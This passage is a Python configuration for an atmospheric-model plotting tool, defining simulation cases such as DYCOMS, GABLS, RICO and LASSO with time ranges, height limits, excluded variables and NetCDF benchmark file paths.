{'name': 'dycoms2_rf02_ds_restart', 'description': "Copied from plotgen: ** Uniform, coarse verticle grid spacing of 40 m. 
**", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_restart_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_ds_restart_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_ds_restart_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_SO = {'name': 'dycoms2_rf02_so', 'description': "Copied from plotgen: " + "** WRF-type stretched (unevenly spaced) grid (grid_type = 3) ** ", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_nodr_sed/DYCOMS_RF02_128x128x96_nodr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_so_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_so_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_so_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zt.nc', 'sfc': 
R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]} FIRE = {'name': 'fire', 'description': "", 'start_time': 61, 'end_time': 120, 'height_min_value': 0, 'height_max_value': 1000, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/fire_zm.nc', 'zt': clubb_output_root + '/fire_zt.nc', 'sfc': clubb_output_root + '/fire_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + "/fire_zm.nc", 'zt': HOC_OUTPUT_ROOT + '/fire_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/fire_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/fire_zm_wrf.nc", 'zt': wrf_output_root + "/fire_zt_wrf.nc", 'sfc': wrf_output_root + "/fire_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} # No budgets GABLS2 = {'name': 'gabls2', 'description': "", 'start_time': 2101, 'end_time': 2160, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': ['tau_zm', 'radht', 'Skw_zt', 'Skrt_zt', 'Skthl_zt', 'corr_w_chi_1', 'corr_chi_eta_1', 'rcp2', 'thlpthvp', 'rtpthvp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc', 'zt': clubb_output_root + '/gabls2_zt.nc', 
'sfc': clubb_output_root + '/gabls2_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sw.nc", 'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sfc.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GABLS2_NIGHTLY = {'name': 'gabls2_nightly', 'description': "", 'start_time': 2101, 'end_time': 2160, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc', 'zt': clubb_output_root + '/gabls2_zt.nc', 'sfc': clubb_output_root + '/gabls2_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupScalars]} GABLS3 = {'name': 'gabls3', 'description': "", 'start_time': 1081, 'end_time': 1200, 'height_min_value': 0, 'height_max_value': 4970, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/gabls3_zm.nc', 'zt': clubb_output_root + '/gabls3_zt.nc', 'sfc': clubb_output_root + '/gabls3_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GABLS3_NIGHT = {'name': 'gabls3_night', 'description': "Copied from plotgen: Uses a 5-min timestep with 48 levels", 'start_time': 421, 'end_time': 480, 'height_min_value': 0, 'height_max_value': 800, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/GABLS3_NIGHT/gabls3_night.nc"}, 'clubb_file': {'zm': 
clubb_output_root + '/gabls3_night_zm.nc', 'zt': clubb_output_root + '/gabls3_night_zt.nc', 'sfc': clubb_output_root + '/gabls3_night_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} GATE_SHEAR_RLSF = {'name': 'gate_shear_rlsf', 'description': "", 'start_time': 540, 'end_time': 720, 'height_min_value': 0, 'height_max_value': 24000, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/GATE_shear_rlsf/GATE_shear_rlsf_64x64x128_1km_5s.nc"}, 'clubb_file': None, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/GATE_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase]} # Use to plot IOP forced SAM runs IOP = {'name': 'iop', 'description': "", 'start_time': 181, 'end_time': 1440, 'height_min_value': 0, 'height_max_value': 27750, 'blacklisted_vars': [], 'clubb_datasets': None, 'sam_benchmark_file': None, 'clubb_file': None, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'var_groups': [VariableGroupBase, VariableGroupSamProfiles]} JUN25_ALTOCU = {'name': 'jun25_altocu', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 4825, 'height_max_value': 7290, 'blacklisted_vars': ['Ngm', 'wprrp', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/jun25_altocu_zm.nc', 'zt': clubb_output_root + '/jun25_altocu_zt.nc', 'sfc': clubb_output_root + '/jun25_altocu_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + 
"/jun25_altocu_qc3_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} LBA = {'name': 'lba', 'description': "Note that sam-plotgen plots up to a height of 16000 not 12000.\n" "Copied from plotgen: SAM-LES uses Morrison microphysics " + "and CLUBB standalone uses COAMPS microphysics", 'start_time': 300, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 14000, 'blacklisted_vars': ['wprrp', 'wpNrp', 'Ngm'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/LBA_128kmx128kmx128_1km_Morrison/LBA_128kmx128kmx128_1km_Morrison.nc"}, 'clubb_file': {'zm': clubb_output_root + '/lba_zm.nc', 'zt': clubb_output_root + '/lba_zt.nc', 'sfc': clubb_output_root + '/lba_sfc.nc', 'subcolumns': clubb_output_root + '/lba_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/LBA_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP, VariableGroupWs]} MC3E = {'name': 'mc3e', 'description': "", 'start_time': 60, 'end_time': 64800, 'height_min_value': 0, 'height_max_value': 18000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/MC3E_r1359_128x128x128_1km_Morrison/MC3E.nc"}, 'clubb_file': {'zm': clubb_output_root + '/mc3e_zm.nc', 'zt': clubb_output_root + '/mc3e_zt.nc', 'sfc': clubb_output_root + '/mc3e_sfc.nc', 'subcolumns': clubb_output_root + '/mc3e_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': 
None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_A = {'name': 'mpace_a', 'description': "Copied from plotgen: SAM-LES and CLUBB standalone use Morrison microphysics", 'start_time': 4141, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 10000, 'blacklisted_vars': ['Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'Ngm', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/MPACE_A/MPACE_A_128x128x69_morr_CEM.nc"}, 'clubb_file': {'zm': clubb_output_root + '/mpace_a_zm.nc', 'zt': clubb_output_root + '/mpace_a_zt.nc', 'sfc': clubb_output_root + '/mpace_a_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_B = {'name': 'mpace_b', 'description': "Copied from plotgen: **The nightly simulation uses COAMPS microphysics**", 'start_time': 541, 'end_time': 720, 'height_min_value': 0, 'height_max_value': 2750, 'blacklisted_vars': ['Ngm', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/mpace_b_zm.nc', 'zt': clubb_output_root + '/mpace_b_zt.nc', 'sfc': clubb_output_root + '/mpace_b_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc", 'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sfc.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} MPACE_B_SILHS = {'name': 'mpace_b_silhs', 'description': "", 'start_time': 541, 'end_time': 720, 
'height_min_value': 0, 'height_max_value': 2750, 'blacklisted_vars': ['Ngm', 'wpNrp'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/mpace_b_silhs_zm.nc', 'zt': clubb_output_root + '/mpace_b_silhs_zt.nc', 'sfc': clubb_output_root + '/mpace_b_silhs_sfc.nc', 'subcolumns': clubb_output_root + '/mpace_b_silhs_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/mpace_b_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} NOV11_ALTOCU = {'name': 'nov11_altocu', 'description': "", 'start_time': 91, 'end_time': 150, 'height_min_value': 4160, 'height_max_value': 6150, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/nov11_altocu_zm.nc', 'zt': clubb_output_root + '/nov11_altocu_zt.nc', 'sfc': clubb_output_root + '/nov11_altocu_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/nov11_altocu_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/nov11_altocu_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/nov11_altocu_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/nov11_altocu_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/nov11_altocu_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} RICO = {'name': 'rico', 'description': "Cam output may differ from plotgen due to a difference in time averaging.", 
'start_time': 4201, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 5000, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"}, 'clubb_file': {'zm': clubb_output_root + '/rico_zm.nc', 'zt': clubb_output_root + '/rico_zt.nc', 'sfc': clubb_output_root + '/rico_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': {'e3sm': e3sm_output_root + "/rico.nc"}, 'cam_file': {'cam': cam_output_root + "/rico_cam.nc"}, 'sam_file': {'sam': sam_output_root + "/RICO_256x256x100_drizzle.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations, VariableGroupKKMP]} RICO_SILHS = {'name': 'rico_silhs', 'description': "Copied from plotgen: CLUBB and SAM use Khairoutdinov-Kogan microphysics", 'start_time': 4201, 'end_time': 4320, 'height_min_value': 0, 'height_max_value': 4500, 'blacklisted_vars': ['wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/RICO_256x256x100_drizzle/RICO_256x256x100_drizzle.nc"}, 'clubb_file': {'zm': clubb_output_root + '/rico_silhs_zm.nc', 'zt': clubb_output_root + '/rico_silhs_zt.nc', 'sfc': clubb_output_root + '/rico_silhs_sfc.nc', 'subcolumns': clubb_output_root + '/rico_silhs_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/rico_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupWs, VariableGroupCorrelations, VariableGroupKKMP]} 
NEUTRAL = {'name': 'neutral', 'description': "", 'start_time': 181, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1500, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/NEUTRAL/NEUTRAL_96x96x96_32m_10m_LES.nc"}, 'clubb_file': {'zm': clubb_output_root + '/neutral_zm.nc', 'zt': clubb_output_root + '/neutral_zt.nc', 'sfc': clubb_output_root + '/neutral_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs]} TWP_ICE = {'name': 'twp_ice', 'description': "Copied from plotgen: Both vertical and horizontal fluxes applied to THLM and RTM for LES. " "LES nudged U, V, RTM and THLM toward observed values. Forcings for LES derived from 10mb " "forcing data.", 'start_time': 60, 'end_time': 9900, 'height_min_value': 0, 'height_max_value': 19000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/TWP_ICE_r1315_128x128x128_1km_Morrison/TWP_ICE.nc"}, 'clubb_file': {'zm': clubb_output_root + '/twp_ice_zm.nc', 'zt': clubb_output_root + '/twp_ice_zt.nc', 'sfc': clubb_output_root + '/twp_ice_sfc.nc', 'subcolumns': clubb_output_root + '/twp_ice_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} WANGARA = {'name': 'wangara', 'description': "Note that COAMPS benchmark data is actually RAMS data by default.", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1900, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': 
{'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/WANGARA/WANGARA_64x64x80_100m_40m_LES.nc"}, 'clubb_file': {'zm': clubb_output_root + '/wangara_zm.nc', 'zt': clubb_output_root + '/wangara_zt.nc', 'sfc': clubb_output_root + '/wangara_sfc.nc'}, 'coamps_benchmark_file': {'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc", 'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/wangara_rams.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/wangara_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/wangara_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/wangara_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/wangara_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/wangara_zm_wrf.nc", 'zt': wrf_output_root + "/wangara_zt_wrf.nc", 'sfc': wrf_output_root + "/wangara_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170627 = {'name': 'lasso_20170627', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-06-27/wrf_lasso_stats_2017-06-27.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-06-27_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-06-27_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-06-27_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-06-27_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170717 = {'name': 'lasso_20170717', 'description': "Comparing 
WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-17/wrf_lasso_stats_2017-07-17.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-17_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-07-17_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-07-17_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-07-17_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170728 = {'name': 'lasso_20170728', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-07-28/wrf_lasso_stats_2017-07-28.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-07-28_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-07-28_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-07-28_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-07-28_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20170923 = {'name': 'lasso_20170923', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': 
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2017-09-23/wrf_lasso_stats_2017-09-23.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2017-09-23_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2017-09-23_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2017-09-23_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2017-09-23_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180911 = {'name': 'lasso_20180911', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-11/wrf_lasso_stats_2018-09-11.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-11_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-11_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-11_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-11_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180917 = {'name': 'lasso_20180917', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-17/wrf_lasso_stats_2018-09-17.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + 
'/lasso_2018-09-17_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-17_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-17_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-17_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20180918 = {'name': 'lasso_20180918', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-18/wrf_lasso_stats_2018-09-18.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-18_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-09-18_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-09-18_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-09-18_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} LASSO_20181002 = {'name': 'lasso_20181002', 'description': "Comparing WRF-CLUBB output to WRF-LASSO output.", 'start_time': 301, 'end_time': 600, 'height_min_value': 0, 'height_max_value': 4000, 'blacklisted_vars': [], 